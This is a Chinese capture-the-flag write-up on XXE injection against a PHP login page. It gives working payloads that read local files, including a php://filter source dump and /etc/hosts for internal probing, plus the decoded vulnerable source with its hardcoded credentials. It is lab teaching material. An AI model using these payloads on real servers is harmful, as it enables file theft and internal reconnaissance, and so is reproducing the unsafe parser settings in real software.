[PHP知识库]XML实体注入

XML实体注入

首先介绍下基础知识把

XML大体格式如下：

接下来我以一个题目讲解

首先题目已经告诉我们了这是一道关于XML的题目

那么怎么做呢

我们打开靶机发现是一个登录界面

我们审查网页源代码

发现里面还有个dologin.php类似于PHP源码。所以我们考虑BP抓包发现是个XXE漏洞Accept: application/xml, text/xml, */*; q=0.01

X-Requested-With: XMLHttpRequest

我们用这个格式payload来读取<?xml version="1.0" encoding="utf-8" ?>

<!DOCTYPE hack [

<!ENTITY file SYSTEM "file:///flag">

]>

<user>

<username>&file;</username>

<password>hack</password>

</user>

发现无法读入

所以我们考虑读取他的源码

<?xml version="1.0" encoding="utf-8" ?>

<!DOCTYPE hack [

<!ENTITY file SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/html/doLogin.php">

]>

<user>

<username>&file;</username>

<password>hack</password>

</user>

读取成功PD9waHAKLyoqCiogYXV0b3I6IGMwbnkxCiogZGF0ZTogMjAxOC0yLTcKKi8KCiRVU0VSTkFNRSA9ICdhZG1pbic7IC8v6LSm5Y+3CiRQQVNTV09SRCA9ICcwMjRiODc5MzFhMDNmNzM4ZmZmNjY5M2NlMGE3OGM4OCc7IC8v5a+G56CBCiRyZXN1bHQgPSBudWxsOwoKbGlieG1sX2Rpc2FibGVfZW50aXR5X2xvYWRlcihmYWxzZSk7CiR4bWxmaWxlID0gZmlsZV9nZXRfY29udGVudHMoJ3BocDovL2lucHV0Jyk7Cgp0cnl7CgkkZG9tID0gbmV3IERPTURvY3VtZW50KCk7CgkkZG9tLT5sb2FkWE1MKCR4bWxmaWxlLCBMSUJYTUxfTk9FTlQgfCBMSUJYTUxfRFRETE9BRCk7CgkkY3JlZHMgPSBzaW1wbGV4bWxfaW1wb3J0X2RvbSgkZG9tKTsKCgkkdXNlcm5hbWUgPSAkY3JlZHMtPnVzZXJuYW1lOwoJJHBhc3N3b3JkID0gJGNyZWRzLT5wYXNzd29yZDsKCglpZigkdXNlcm5hbWUgPT0gJFVTRVJOQU1FICYmICRwYXNzd29yZCA9PSAkUEFTU1dPUkQpewoJCSRyZXN1bHQgPSBzcHJpbnRmKCI8cmVzdWx0Pjxjb2RlPiVkPC9jb2RlPjxtc2c+JXM8L21zZz48L3Jlc3VsdD4iLDEsJHVzZXJuYW1lKTsKCX1lbHNlewoJCSRyZXN1bHQgPSBzcHJpbnRmKCI8cmVzdWx0Pjxjb2RlPiVkPC9jb2RlPjxtc2c+JXM8L21zZz48L3Jlc3VsdD4iLDAsJHVzZXJuYW1lKTsKCX0JCn1jYXRjaChFeGNlcHRpb24gJGUpewoJJHJlc3VsdCA9IHNwcmludGYoIjxyZXN1bHQ+PGNvZGU+JWQ8L2NvZGU+PG1zZz4lczwvbXNnPjwvcmVzdWx0PiIsMywkZS0+Z2V0TWVzc2FnZSgpKTsKfQoKaGVhZGVyKCdDb250ZW50LVR5cGU6IHRleHQvaHRtbDsgY2hhcnNldD11dGYtOCcpOwplY2hvICRyZXN1bHQ7Cj8 base64的字符串我们把它放到decoder模块进行解码<?php

/**

* autor: c0ny1

* date: 2018-2-7

*/

$USERNAME = 'admin'; //è′|?·

$PASSWORD = '024b87931a03f738fff6693ce0a78c88'; //?ˉ??

$result = null;

libxml_disable_entity_loader(false);

$xmlfile = file_get_contents('php://input');

try{

$dom = new DOMDocument();

$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);

$creds = simplexml_import_dom($dom);

$username = $creds->username;

$password = $creds->password;

if($username == $USERNAME && $password == $PASSWORD){

$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",1,$username);

}else{

$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",0,$username);

}

}catch(Exception $e){

$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",3,$e->getMessage());

}

header('Content-Type: text/html; charset=utf-8');

echo $result;

?>

我们审计发现啥都没有

后来发现XXE还能查内网

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE user [

<!ENTITY xxe SYSTEM "file:///etc/hosts">

]>

<user><username>&xxe;</username><password>&xxe;</password></user>

我们探查存存活主机、

发现127.0.0.1 localhost

::1 localhost ip6-localhost ip6-loopback

fe00::0 ip6-localnet

ff00::0 ip6-mcastprefix

ff02::1 ip6-allnodes

ff02::2 ip6-allrouters

我们发现并没有我们需要的存活主机那么我们用BP来跑

最后发现这台主机有flag

1